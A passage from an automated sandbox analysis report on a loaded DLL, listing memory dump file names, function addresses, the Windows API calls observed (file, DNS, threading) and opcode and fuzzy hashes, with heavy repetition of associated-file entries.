Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 85da19cb9718f0f4174ece2e551903f916d3106d294e82e3c6438b44ded168dc
Instruction ID: c7e2b7f382e15aaba3da55e720988bb5c21b90d2a754a6285c597935e8af0081
Opcode Fuzzy Hash: 85da19cb9718f0f4174ece2e551903f916d3106d294e82e3c6438b44ded168dc
Instruction Fuzzy Hash: C24182B361C6109FE3156E18D8856AAB7E5EF98720F17092DE7C983740EA3098418BD6

Function 6CEB561B Relevance: 1.6, APIs: 1, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB5620

Part of subcall function 6CEB2E7A: InterlockedExchange.KERNEL32(?,00000000), ref: 6CEB2E83

Part of subcall function 6CEB2DB5: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2DEE

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$H_prolog
String ID:
API String ID: 101647241-0
Opcode ID: 86999fa516c29e3bd91966a9bc4bc53e28e3fff49faff3f64bfdadad742ff2fa
Instruction ID: 2f9dd647d8f5001022321ec8092692c56d99eee6abeb7ad170587845d870d380
Opcode Fuzzy Hash: 86999fa516c29e3bd91966a9bc4bc53e28e3fff49faff3f64bfdadad742ff2fa
Instruction Fuzzy Hash: 23418E719012099ACF04EBF0DAA49FDB779AF25248F20442DE812B7B90EF349B0DC790

Function 6CEB3061 Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,00000000,?,?,6CEB9EE6,?,6CEF14BC,6CEF14A0,?,?,?,?,?,?,?,6CEB83FF), ref: 6CEB3088

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 5bd75a3959ccf59cdc62f52f93f1432a0bdace95cdf60213dd858fb8e1d0edb1
Instruction ID: f4d846b6c1a9099bd5b8e977a69dd181c09e9271f3dd32e5a54e83e0909f525b
Opcode Fuzzy Hash: 5bd75a3959ccf59cdc62f52f93f1432a0bdace95cdf60213dd858fb8e1d0edb1
Instruction Fuzzy Hash: 2621F5B1A04608ABEB149BA9DE419FE77BDDF4436CF20015DE919737C0DF305D0886A1

Function 6CF0256D Relevance: 1.6, APIs: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI ref: 6CF3BDBC

Memory Dump Source

Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 2c75a0694e232a8d556985b0fdb2ab5fee0902529e61c6e3cdad9857ef2ef72f
Instruction ID: 8df7631a4240214b4f7e1260f3d3611dafca54d3b7ddc252b4b9cbf1c7971605
Opcode Fuzzy Hash: 2c75a0694e232a8d556985b0fdb2ab5fee0902529e61c6e3cdad9857ef2ef72f
Instruction Fuzzy Hash: 680184F770D600AFF7025A19ECC17BABBE5FBD9720F05852EE7C082614DA3248018667

Function 6CEB3F84 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 6CEB3FA0

Part of subcall function 6CEB3954: __EH_prolog.LIBCMT ref: 6CEB3959

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CompareExchangeH_prologInterlocked
String ID:
API String ID: 3260258793-0
Opcode ID: 06a62b2b3b121edeaad35dc6bfcdd5cae5ff76ec40c3bd752f7d3670c6792d36
Instruction ID: f3d45348f9458797139b19f795800e651fd1ed1c3752190c8307565a11cda2f1
Opcode Fuzzy Hash: 06a62b2b3b121edeaad35dc6bfcdd5cae5ff76ec40c3bd752f7d3670c6792d36
Instruction Fuzzy Hash: 4701A2B2104306AFC700DF64D9468E6FBBCEF40278B20072EA579936D0EB30A91CC6A1

Function 6CF03342 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNELBASE ref: 6CF5B4A6

Memory Dump Source

Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: b836bb7c5f2a8480d96154ab61e957d100f009461536030a4e280d051c23aecb
Instruction ID: 86b9d77d441d55befd0a06f1421f3335ba8511c7cf194ba20c72f8dcdb4cf03b
Opcode Fuzzy Hash: b836bb7c5f2a8480d96154ab61e957d100f009461536030a4e280d051c23aecb
Instruction Fuzzy Hash: F5F0A0B15087928ECB54AF7CC081099BBF0FB1A360B510D6CC4C1DB656E73091D9CF52

Function 6CECBBA5 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CECE3AA: __getptd_noexit.LIBCMT ref: 6CECE3AB
Part of subcall function 6CECE3AA: __amsg_exit.LIBCMT ref: 6CECE3B8

Part of subcall function 6CECBBE6: __getptd_noexit.LIBCMT ref: 6CECBBEA
Part of subcall function 6CECBBE6: __freeptd.LIBCMT ref: 6CECBC04
Part of subcall function 6CECBBE6: ExitThread.KERNEL32 ref: 6CECBC0D

__XcptFilter.LIBCMT ref: 6CECBBD2

Part of subcall function 6CED14E4: __getptd_noexit.LIBCMT ref: 6CED14E8

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
